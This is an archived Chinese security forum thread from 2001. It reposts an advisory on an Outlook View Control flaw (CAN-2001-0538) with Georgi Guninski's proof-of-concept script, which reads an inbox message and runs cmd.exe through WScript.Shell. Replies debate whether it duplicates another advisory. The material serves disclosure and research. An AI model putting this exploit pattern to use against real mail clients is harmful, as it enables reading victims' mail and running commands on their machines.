这是在 20CN网络安全小组第一代论坛 的论坛 安全漏洞 中的主题 Microsoft Outlook 任意代码执行漏洞


要查看这个主题,请使用这个 URL:
http://www.20cn.net/cgi-bin/ubb/ultimatebb.cgi?ubb=get_topic;f=3;t=000272

DevilDragon 发表于 :
 
受影响的系统:
Microsoft Outlook 98
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
Microsoft Outlook 2002
Microsoft Outlook 2000
- Microsoft Windows NT 4.0
- Microsoft Windows 2000

描述:
--------------------------------------------------------------------------------

BUGTRAQ ID : 3026
CVE ID :CAN-2001-0538

Microsoft Outlook存在安全漏洞,可能导致攻击者在目标系统上执行任意命令。

这主要是由于一个新的控件“Microsoft Outlook View Control”造成的,它声称自己
“safe for scripting”,但实际上却不是,所以导致了脚本对它的访问。

利用这个漏洞,攻击者可能在用户不知情的情况下利用脚本执行任意命令。

<*来源:Georgi Guninski (guninski@guninski.com)
参考:http://www.guninski.com/vv2xp.html
*>



测试程序:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Georgi Guninski (guninski@guninski.com)提供了如下测试代码:

假设你的收件箱里不止有一封信:

<br>
<object id="o1"
classid="clsid:0006F063-0000-0000-C000-000000000046"
>
<param name="folder" value="Inbox">
</object>

<script>
function f()
{
//alert(o2.object);
sel=o1.object.selection;
vv1=sel.Item(1);
alert("Subject="+vv1.Subject);
alert("Body="+vv1.Body+"["+vv1.HTMLBody+"]");
alert("May be deleted");
//vv1.Delete();

vv2=vv1.Session.Application.CreateObject("WScript.Shell");

alert("Much more fun is possible");


vv2.Run("C:\\WINNT\\SYSTEM32\\CMD.EXE /c DIR /A /P /S C:\\ ");

}
setTimeout("f()",2000);
</script>


 


NetDemon (编号: 2) 发表于 :
 
7456

http://www.20cn.net/ns/ld/win/data/20010714044517.htm

文档发表时间:2001-07-14


 


DevilDragon 发表于 :
 
不一样,你的那个是XP的,我这个是任何版本的outlook.
 
NetDemon (编号: 2) 发表于 :
 
漏洞资料你要看得仔细,了解其真正的内容,现在你说,这两个有什么不同?连测试代码都一样,
如果你发一个 c:\con\con 的邮件个一个用outlook的用户,他当然完蛋,但你说这个就是outlook的漏洞吗?一样性质的东西,可以有不同的表达方式

------------------
微软给了我窗户,因此UNIX给了我房子
微软给我窗户了吗?没有
所以UNIX没有给了我房子
我仍然游荡在Internet上
 






Powered by Infopop Corporation
UBB.classic™ 6.5.0
NetDemon修改版 1.5.0, 20CN网络安全小组 版权所有。